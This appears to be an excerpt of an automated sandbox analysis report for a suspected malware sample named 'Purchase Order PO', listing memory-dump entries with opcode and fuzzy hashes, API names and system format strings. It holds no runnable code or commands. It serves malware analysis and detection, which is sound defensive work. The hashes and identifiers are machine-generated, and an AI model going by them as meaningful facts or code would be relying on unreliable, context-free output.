                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 01e51ac4af72ebc2456db4d2e3841f34b4decf1f2a8af8ad6f24adad14548594
                                                                                                                            • Instruction ID: a79b0ae27ba1a1c15cce4088949f5872079526d5e40a67ed22a92d87705649c8
                                                                                                                            • Opcode Fuzzy Hash: 01e51ac4af72ebc2456db4d2e3841f34b4decf1f2a8af8ad6f24adad14548594
                                                                                                                            • Instruction Fuzzy Hash: 50F06270A01249DFCB04EFA9C655A6EBBB4FF18340F408066B955EB395DB38EE01CB94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 33929834f3c334ddbc992868836741abf96b7ce4009be3373e0ec7a67475342e
                                                                                                                            • Instruction ID: 25d26fd3f226d3e8a6efdcfd92b99324b5130064e593e029d9be4490542dcd7c
                                                                                                                            • Opcode Fuzzy Hash: 33929834f3c334ddbc992868836741abf96b7ce4009be3373e0ec7a67475342e
                                                                                                                            • Instruction Fuzzy Hash: CDF0BE319166E19FEF33CB6CC744B21BBD89B08630F09CDAAD5898F502DB24D8C2C650
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c187f9e802d79e6318bb41cbc0f147b095855e3d72092b4df893c4b932d62d00
                                                                                                                            • Instruction ID: 241086217a5a2e71634be0075d069eec9e3463235903dc488be7cc11f754c181
                                                                                                                            • Opcode Fuzzy Hash: c187f9e802d79e6318bb41cbc0f147b095855e3d72092b4df893c4b932d62d00
                                                                                                                            • Instruction Fuzzy Hash: AFF027264156C107CF7A7B2CA4503D53B64E756B10F0A10C9FDA15B206C7B48483C365
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode Fuzzy Hash: ed48e6d72ae38ede710f1a577f442170d4219843c7c47f7d7326d92384c3b7c5
                                                                                                                            • Instruction Fuzzy Hash: 4FD05230A010029BDF2BCF0CCA15A7E7AB2EF10A40F8800ACE60092020E328D901CA00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                            • Instruction ID: a72bf58d97a7977834f5d72df819268405161a4b82d7769970f51099955d4013
                                                                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                            • Instruction Fuzzy Hash: AFD09235212A80CFD62A8B4DC6A4B1633A4BB44A44FC50490F641CBB22D738D944CA00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                            • Instruction ID: a1c6177921a01c364d239f8e80688838d9fdbf703d14b8cf96eba3121c0d3d02
                                                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                            • Instruction Fuzzy Hash: 23C01232150644AFC7119E95CD01F1177A9EB98B40F400021F20447570C631E810D644
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                            • Instruction ID: 0779628f5148997cfb66071247825dcd8e86006ad36d19679669673de505e8ff
                                                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                            • Instruction Fuzzy Hash: B6D01236100288EFCB01DF41C990D9B773AFBD8710F109019FD19076118A31ED62DA50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                            • Instruction ID: c24f83511a0c24a4617e63da8d289bef32838ad916f1be109ccccc1e8e67f82c
                                                                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                            • Instruction Fuzzy Hash: AFC04879701A42CFCF16DB6ED398F59B7E4FB88740F155890E805CBB22E724E815CA50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                            • Instruction ID: d3616535db01c1d1bc361753bd28eb088b93927ba8fb5cfdc5f1270211ec5fa8
                                                                                                                            • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                            • Instruction Fuzzy Hash: AEB01232212585CFC7036720CB40B5832ADBF117C0F0900F16500C9831D6289910E501
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 731d85019525bc0921241631aa7fd2e4e39cb82dd0e7edfa374995ebbaa7cc91
                                                                                                                            • Instruction ID: f459adebe2f7da9e371c266c65cc7ec53e57730c6cf08276f551751434577c1e
                                                                                                                            • Opcode Fuzzy Hash: 731d85019525bc0921241631aa7fd2e4e39cb82dd0e7edfa374995ebbaa7cc91
                                                                                                                            • Instruction Fuzzy Hash: 99900231605800129140715848885464045A7E0301F56C011E0424654CCA188A565361
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3d1835505605397f8ee9f424246bdc7e19c5e0294540aab276c961c06ff1f781
                                                                                                                            • Instruction ID: 0521c11ad4b186bc4aebef781137546a04d87cf161bb89ed92e3ce954188dbf6
                                                                                                                            • Opcode Fuzzy Hash: 3d1835505605397f8ee9f424246bdc7e19c5e0294540aab276c961c06ff1f781
                                                                                                                            • Instruction Fuzzy Hash: 9C900261601500424140715848084066045A7E1301796C115E0554660CC61C89559369
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 163ede3b68f951667a651453b579a81a94e6d97d0b357b3e1b90305bd74cf87a
                                                                                                                            • Instruction ID: fc2b2d112fba330f577bbdbb23cca0270d7f1fd6516cd23a92830a1d9b5da177
                                                                                                                            • Opcode Fuzzy Hash: 163ede3b68f951667a651453b579a81a94e6d97d0b357b3e1b90305bd74cf87a
                                                                                                                            • Instruction Fuzzy Hash: 1290023160540802D15071584418746004597D0301F56C011E0024754DC7598B5577A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 28346c4bbe4fe3e2c19eafe3dca0a589c37cdb7b443896611087576e2ff1da64
                                                                                                                            • Instruction ID: 4f9f0ee73b865d3171e5f547871c289279178b4f0367438ebeecfb07bf1f9a1a
                                                                                                                            • Opcode Fuzzy Hash: 28346c4bbe4fe3e2c19eafe3dca0a589c37cdb7b443896611087576e2ff1da64
                                                                                                                            • Instruction Fuzzy Hash: C690023120140802D10471584808686004597D0301F56C011E6024755ED66989917231
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 469a29c1e75bd58b4ef597d6e0e5f024c2125163174c8ea554c2074a0a904a1c
                                                                                                                            • Instruction ID: b93f2d7b195b5ac2e99576bd1079f81e89f28615c6569e43c3297e5b0ce9e7e7
                                                                                                                            • Opcode Fuzzy Hash: 469a29c1e75bd58b4ef597d6e0e5f024c2125163174c8ea554c2074a0a904a1c
                                                                                                                            • Instruction Fuzzy Hash: ED90023120544842D14071584408A46005597D0305F56C011E0064794DD6298E55B761
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9e1722238a83c09cda1023aa9aadf9dd17c9032550da452faea1d5f8a5b0e963
                                                                                                                            • Instruction ID: 836e4f2bacd5201d5956d640d71c0ffe74adb7d2c678aa271038576ae62c5d50
                                                                                                                            • Opcode Fuzzy Hash: 9e1722238a83c09cda1023aa9aadf9dd17c9032550da452faea1d5f8a5b0e963
                                                                                                                            • Instruction Fuzzy Hash: FE90023120140802D1807158440864A004597D1301F96C015E0025754DCA198B5977A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f783aaf4754d1d223a9101c6c598594ff7a4a7fdedd27140e0e2bb037f71cd41
                                                                                                                            • Instruction ID: 68cf06e88da2b8e3972ac9d04183dccc9988aa9f3f68c674e90df7f1e9058152
                                                                                                                            • Opcode Fuzzy Hash: f783aaf4754d1d223a9101c6c598594ff7a4a7fdedd27140e0e2bb037f71cd41
                                                                                                                            • Instruction Fuzzy Hash: F19002A1201540924500B2588408B0A454597E0201F56C016E1054660CC52989519235
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 176b5829ecc2c104503e5a71c01bdb03dd10ac1e9c101e861ac14e0a917d94e4
                                                                                                                            • Instruction ID: f9d2af790dffcaf6083aa6fad83a30b96f68c459758a18b15fcd7941aedfc013
                                                                                                                            • Opcode Fuzzy Hash: 176b5829ecc2c104503e5a71c01bdb03dd10ac1e9c101e861ac14e0a917d94e4
                                                                                                                            • Instruction Fuzzy Hash: 39900225221400020145B558060850B0485A7D6351796C015F1416690CC62589655321
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96b7c75a20c83707c91a839ba83fc3e46b8894876a8778983d6e02ff186b9584
                                                                                                                            • Instruction ID: 42563a78d922166bbb1d714a00e7785dcd292483d6819e1cbf5368e5645d500e
                                                                                                                            • Opcode Fuzzy Hash: 96b7c75a20c83707c91a839ba83fc3e46b8894876a8778983d6e02ff186b9584
                                                                                                                            • Instruction Fuzzy Hash: ED90022160140502D10171584408616004A97D0241F96C022E1024655ECA298A92A231
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a28debb057385e6406769110b79c07af2351daf96bc3ab37d357d0c1aa8fe2e3
                                                                                                                            • Instruction ID: 9b9b32dd0f6e5eb38f344a47b1908f0149a162c2863f6a21c698a616b0d8eb2e
                                                                                                                            • Opcode Fuzzy Hash: a28debb057385e6406769110b79c07af2351daf96bc3ab37d357d0c1aa8fe2e3
                                                                                                                            • Instruction Fuzzy Hash: 5490026120180403D14075584808607004597D0302F56C011E2064655ECA2D8D516235
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 41950c3107acb014d1da71447b1eaddd12f22b5702b3d9b358542fec2790db9a
                                                                                                                            • Instruction ID: db002d59569c7f50ad4871133554446a0d5f630283194786235b8183967f783e
                                                                                                                            • Opcode Fuzzy Hash: 41950c3107acb014d1da71447b1eaddd12f22b5702b3d9b358542fec2790db9a
                                                                                                                            • Instruction Fuzzy Hash: FD90022130140402D102715844186060049D7D1345F96C012E1424655DC6298A53A232
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 88f66d437ff36b07433e532cad552a300b8d35ff065b6b17fe7bde66f9f0dd9d
                                                                                                                            • Instruction ID: 04391bb5f9ea4a361678e69d17230c28ec0518a57e49cfe2df26e85ef790a13a
                                                                                                                            • Opcode Fuzzy Hash: 88f66d437ff36b07433e532cad552a300b8d35ff065b6b17fe7bde66f9f0dd9d
                                                                                                                            • Instruction Fuzzy Hash: 7590022124140802D140715884187070046D7D0601F56C011E0024654DC61A8A6567B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 36ad150a8cae86dd6fc9817db99a963e7dc1c29477283e180aaa603241177ccf
                                                                                                                            • Instruction ID: f636358054738b42a1009a51b9eadfc49a93d68d9d890b1709b9e05902393a31
                                                                                                                            • Opcode Fuzzy Hash: 36ad150a8cae86dd6fc9817db99a963e7dc1c29477283e180aaa603241177ccf
                                                                                                                            • Instruction Fuzzy Hash: F890022120184442D14072584808B0F414597E1202F96C019E4156654CC91989555721
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 78096a5309d4bb9cb3be4b46394a37749f4553986bd8db7c5f68de80227086ce
                                                                                                                            • Instruction ID: 015c381c6f8380ae54e9dc07706465262541d2d6cac03e8df1fb030e90ab237a
                                                                                                                            • Opcode Fuzzy Hash: 78096a5309d4bb9cb3be4b46394a37749f4553986bd8db7c5f68de80227086ce
                                                                                                                            • Instruction Fuzzy Hash: 8490022124545102D150715C44086164045B7E0201F56C021E0814694DC55989556321
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4d7ae23415528ecfab5efcf2c0203fb68f165ec40be96899545ddc6cb2a2fd26
                                                                                                                            • Instruction ID: 9bec3cd577146bdd5d394aa9f8a9f4f40713550779e633691f4735c08c6e0c53
                                                                                                                            • Opcode Fuzzy Hash: 4d7ae23415528ecfab5efcf2c0203fb68f165ec40be96899545ddc6cb2a2fd26
                                                                                                                            • Instruction Fuzzy Hash: 5B90023120240142954072585808A4E414597E1302F96D415E0015654CC91889615321
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e1637c81144afdfa1d080affd9ebb758477085790794b8ef3d4017d007eef61f
                                                                                                                            • Instruction ID: e394f97be6b781cd325ab439101e06a3c63e40e20668afadefeebe0588602288
                                                                                                                            • Opcode Fuzzy Hash: e1637c81144afdfa1d080affd9ebb758477085790794b8ef3d4017d007eef61f
                                                                                                                            • Instruction Fuzzy Hash: 7790023520140402D51071585808646008697D0301F56D411E0424658DC65889A1A221
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                            • Instruction ID: 8cbda16b8bf9915ea72239d69fb845b0b684b4ed37a8807dcca28932c100cf67
                                                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: 10b088c588dc159492e5fcbfe8247693bcfe7e5cabfee2044d40ad1b1eddfc36
                                                                                                                            • Instruction ID: 4a3780a2cfee48c15480a02ff5f91dc97bdbe2a5464f2746e4dd47feb989a933
                                                                                                                            • Opcode Fuzzy Hash: 10b088c588dc159492e5fcbfe8247693bcfe7e5cabfee2044d40ad1b1eddfc36
                                                                                                                            • Instruction Fuzzy Hash: 0051FAB5A046167FDB25DBACC990A7EFBF8BB08240714826AF466D7641D374DE40C7E0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: adb77dd494444f6339afad9c4700030f44120d167db9a9dbd4a1fbd937e8e9b4
                                                                                                                            • Instruction ID: 463ba3a0670ceb459719603416b785260858afd9ad75f9138f7516eb23d3b350
                                                                                                                            • Opcode Fuzzy Hash: adb77dd494444f6339afad9c4700030f44120d167db9a9dbd4a1fbd937e8e9b4
                                                                                                                            • Instruction Fuzzy Hash: 6151F375A00646AFDF28DEACD99097EBBF8EF44200B04C4D9F596C7641E7B4DA00A7A0
                                                                                                                            Strings
                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B046FC
                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B04742
                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B04725
                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01B04787
                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B04655
                                                                                                                            • ExecuteOptions, xrefs: 01B046A0
                                                                                                                            • Execute=1, xrefs: 01B04713
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                            • API String ID: 0-484625025
                                                                                                                            • Opcode ID: 0e7220c87ed2babcf0c5a7dd30ea63e0e77b96b8dfb4d7d7b9e52793f5c49723
                                                                                                                            • Instruction ID: 3d17cbd15d7ee795d6985dd04cbbd453947c68d32eea1c4065585b2d7fdca786
                                                                                                                            • Opcode Fuzzy Hash: 0e7220c87ed2babcf0c5a7dd30ea63e0e77b96b8dfb4d7d7b9e52793f5c49723
                                                                                                                            • Instruction Fuzzy Hash: 4851E431600219BAEF25ABE9DD85BBE7BB8FB14B00F0400EDE605A7191EB719A45CF50
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-$0$0
                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction ID: e9b5ee28e5381c4bac61a49149e7bddc21fb230f294a0a80f837346d071c1879
                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction Fuzzy Hash: D081AF70E06A499FEF258F6CC8517FEBBB1AF46360F1E4159D863A7291C73489408B71
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2133689929.0000000001A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_1a60000_Purchase Order PO.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                            • Opcode ID: c480d061f790595793d86a8de7c79482d8cc313ed42ae9711a78e442725c0189
